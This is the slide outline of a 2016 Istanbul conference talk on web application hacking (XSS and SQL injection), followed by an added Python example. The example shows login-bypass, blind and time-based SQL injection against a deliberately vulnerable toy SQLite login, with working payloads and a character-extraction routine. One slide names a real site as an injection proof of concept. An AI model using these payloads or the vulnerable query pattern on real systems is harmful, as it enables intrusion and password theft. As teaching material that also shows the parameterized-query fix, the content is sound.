
Web Uygulamalarının Hacklenmesi (Hacking Web Applications)


Presented at: Zero-day Conf, İstanbul Kültür Üniversitesi 2016


  1. whoami: Security Researcher @ Netsparker Ltd. Developer @ Another Times. Writer @ Ethical Hacking "Offensive & Defensive" book. Blog: omercitak.com. All social platforms: @Om3rCitak
  2. ping pong?
  3. ping pong?
  4. cross site scripting • Reflected XSS • DOM Based XSS • Stored XSS
  5. reflected cross site scripting
  6. reflected cross site scripting
  7. dom-based cross site scripting
  8. stored cross site scripting
  9. stored cross site scripting
  10. stored cross site scripting
  11. sql injection • Union Based SQL Injection • Blind SQL Injection • Time Based SQL Injection
  12. union based sql injection
  13. login bypass
  14. blind sql injection • What if errors are hidden? (error_reporting(0)) • What if the mysql_* functions are prefixed with "@" (error suppression)?
  15. blind sql injection
  16. blind sql injection
  17. blind sql injection
  18. time-based sql injection • What if the query running in the background produces no output? – Count query – Update query – Insert query – Delete query – Relationship query
  19. time-based sql injection
  20. time-based sql injection: MySQL Server, Microsoft SQL Server, Oracle Server
  21. sql injection poc: Amnesty International (amnesty.org.tr)
  22. sql injection poc
  23. where is the security?
  24. questions
  25. thanks www.omercitak.com All social platforms: @Om3rCitak
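The slides only name the three SQL injection styles (login bypass on slide 13, blind injection with errors hidden on slides 14-17, and time-based injection against a query that produces no output on slides 18-20). The following is an added example, not from the talk or from Netsparker, that shows all three against one toy login form backed by an in-memory SQLite database. Everything beyond the slides is an assumption for illustration: the `users` table and its columns, the password value, and a `SLEEP()` user-defined function registered to stand in for MySQL's `SLEEP()`, which SQLite does not have.

```python
"""Added example (not from the talk): a toy login form vulnerable to SQL
injection, attacked the three ways the slides name, against in-memory SQLite.
Assumed, not in the slides: the `users` table and its columns, the password
value, and a SLEEP() UDF standing in for MySQL's SLEEP() (SQLite has none)."""
import sqlite3
import time


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, last_login INTEGER)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret!', 0)")  # constructed data
    # Emulate MySQL SLEEP(seconds): block, then return 0.
    db.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    return db


def vulnerable_login(db, username, password):
    """Deliberately vulnerable: string concatenation, as in
    mysql_query("... WHERE username = '$u' ..."). Errors are swallowed, the
    slide's error_reporting(0) / @mysql_query() case, so the attacker sees
    only True or False, never an error message."""
    sql = (f"SELECT 1 FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def vulnerable_touch_last_login(db, username):
    """Deliberately vulnerable UPDATE whose result is never shown (slide 18):
    nothing comes back to the user, not even a boolean."""
    try:
        db.execute(f"UPDATE users SET last_login = 1 WHERE username = '{username}'")
    except sqlite3.Error:
        pass


def safe_login(db, username, password):
    """The fix: bound parameters, so user input is never parsed as SQL."""
    row = db.execute("SELECT 1 FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row is not None


# --- slide 13: login bypass -------------------------------------------------
def login_bypass(db):
    # The '--' comments out the password check; only the username matters.
    return vulnerable_login(db, "admin'-- ", "wrong")


# --- slides 14-17: blind (boolean) injection --------------------------------
def boolean_oracle(db, condition):
    """True iff `condition` holds for the admin row; the only signal we get."""
    return vulnerable_login(db, f"admin' AND ({condition})-- ", "x")


# --- slides 18-20: time-based injection ------------------------------------
def time_oracle(db, condition, delay=0.1):
    """Same question answered by response time: the UPDATE returns nothing,
    so we make the database SLEEP only when `condition` is true."""
    payload = f"admin' AND CASE WHEN ({condition}) THEN SLEEP({delay}) ELSE 0 END-- "
    start = time.monotonic()
    vulnerable_touch_last_login(db, payload)
    return time.monotonic() - start >= delay / 2


def extract(oracle, expr, max_len=64):
    """Recover the string `expr` evaluates to, one character at a time, by
    binary search over its code point (7 oracle calls per character instead
    of one per candidate). UNICODE() is SQLite's ASCII()/ORD(); past the end
    of the string it is NULL, which COALESCE turns into 0 and ends the loop."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"COALESCE(UNICODE(SUBSTR({expr},{pos},1)),0) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


def blind_extract_password(db):
    return extract(lambda c: boolean_oracle(db, c), "password")


def time_extract_password(db, delay=0.1):
    return extract(lambda c: time_oracle(db, c, delay), "password")


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_bypass(db))                     # True
    print("blind:", blind_extract_password(db))            # S3cret!
    print("time-based:", time_extract_password(db))        # S3cret!
    print("safe:", safe_login(db, "admin'-- ", "wrong"))   # False
```

The three attacks differ only in the oracle: an error message, a true/false page, or a delay. The binary search over `UNICODE(SUBSTR(...))` is the same for all of them, which is why hiding errors (slide 14) or running the query where its result is never displayed (slide 18) does not stop extraction; only the parameterized query in `safe_login` does. On MySQL the equivalent functions are `ORD()`/`ASCII()` and `SLEEP()`; on Microsoft SQL Server `ASCII()` and `WAITFOR DELAY`; on Oracle `ASCII()` and `DBMS_LOCK.SLEEP` or a heavy subquery.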
